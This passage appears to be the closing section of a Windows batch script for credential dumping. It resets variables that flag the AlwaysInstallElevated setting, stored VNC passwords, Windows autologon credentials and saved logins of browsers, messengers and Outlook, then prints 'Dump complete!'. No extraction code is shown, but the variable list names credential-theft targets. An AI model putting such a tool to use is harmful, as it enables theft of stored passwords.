set OSVersion=
set alwaysinstallelevated=
set realvncpassfound=
set tightvncpassfound1=
set tightvncpassfound2=
set tigervncpassfound=
set vnc3passfound1=
set vnc3passfound2=
set vnc3passfound3=
set winautologinpassfound=
set winautologindomainfound=
set winautologinuserfound=
set defaultloginpass=
set IE6found=
set IE7found=
set AIM6found=
set AIMPROfound=
set BEYLUXEfound=
set BIGANTfound=
set CAMFROGfound=
set GOOGLETALKfound=
set IMVUfound=
set NIMBUZZfound=
set PALTALKfound=
set YAHOOPAGERfound=
set INCREDIMAILfound=
set OUTLOOK2013found=
set OUTLOOK2010POSTNTfound=
set OUTLOOK2010PRENTfound=
set OUTLOOK98MAILONLYfound=
set OUTLOOK98NORMALfound=
goto:eof
:end
echo.
echo.==============
echo.Dump complete!
echo.==============
GOTO:eof